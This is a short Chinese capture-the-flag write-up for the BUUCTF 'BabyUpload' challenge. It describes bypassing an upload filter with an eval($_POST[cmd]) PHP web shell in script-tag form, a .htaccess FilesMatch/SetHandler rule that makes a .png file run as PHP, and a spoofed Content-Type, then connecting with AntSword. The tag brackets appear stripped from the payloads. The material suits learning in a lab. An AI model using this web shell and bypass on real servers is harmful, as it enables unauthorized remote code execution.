buuctf BabyUpload
首先进来可以看出是文件上传漏洞直接bp抓上传文件的木马包看看发到Repeater里看看把1.jpg改成1.php会发现ph被过滤来在试试phtml之类的发现都不行然后发现有.htaccess可以解决htaccess唯一核心用途是强制服务器把图片后缀.png/.gif/.jpg的文件当作 PHP 代码解析然后先把1.jpg改成1.png发现?php eval($_POST[cmd]);?中?也被过滤了可以把?php eval($_POST[cmd]);改成script languagephp eval($_POST[cmd]);/script然后就可以上传了但是script languagephp eval($_POST[cmd]);/script还没有被解析所有还要上传.htaccess文件这个文件有自己创在文件里放FilesMatch 1.pngSetHandler application/x-httpd-php/FilesMatch这里的1.png一定要与前面的一样还有这里的Content-Type: application/octet-stream要改成Content-Type:image/jpeg然后改成上传的script languagephp eval($_POST[cmd]);/script木马就能被解析了在靶场后upload/31e891fe8473da80494517cb53c63dca/1.png加上给的拼接发到蚁剑上这里的密码cmd是因为script languagephp eval($_POST[cmd]);/script这里的是cmd然后进入对应的服务器后台就能找到flag了